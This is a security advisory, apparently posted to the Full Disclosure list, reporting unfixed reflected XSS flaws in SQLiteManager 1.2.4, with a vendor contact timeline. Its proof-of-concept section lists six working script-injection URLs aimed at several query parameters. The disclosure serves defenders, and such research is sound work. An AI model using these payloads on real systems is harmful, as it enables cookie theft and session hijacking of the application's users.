SQLiteManager 1.2.4: Multiple XSS

["Curesec Research Team (CRT)" <crt () curesec com>]

SQLiteManager 1.2.4: Multiple XSS

Security Advisory – Curesec Research Team
1. Introduction

Affected Product:       SQLiteManager 1.2.4     
Fixed in:       not fixed
Fixed Version Link:     n/a     
Vendor Contact:         sqlitemanager () gmail com      
Vulnerability Type:     XSS     
Remote Exploitable:     Yes     
Reported to vendor:     09/01/2015      
Disclosed to public:    10/07/2015      
Release mode:   Full Disclosure 
CVE:    n/a     
Credits         Tim Coen of Curesec GmbH        

2. Vulnerability Description

There are multiple XSS vulnerabilities in SQLiteManager 1.2.4. With
this, it is possible to steal cookies, bypass CSRF protection, or inject
JavaScript keyloggers.
3. Proof of Concept


http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&function=";><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&table=";><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&trigger=";><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&view=";><script>alert(1)</script>

http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&action=browseItem&DisplayQuery=</textarea><script>alert(1)</script>

http://localhost/SQLiteManager-1.2.4/main.php?dbsel=1&table=t1&action=insertElement¤tPage=0'";><script>alert(1)</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015      Informed Vendor about Issue (no reply)
09/22/2015      Reminded Vendor of disclosure date (no reply)
10/07/2015      Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/SQLiteManager-124-Multiple-XSS-67.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/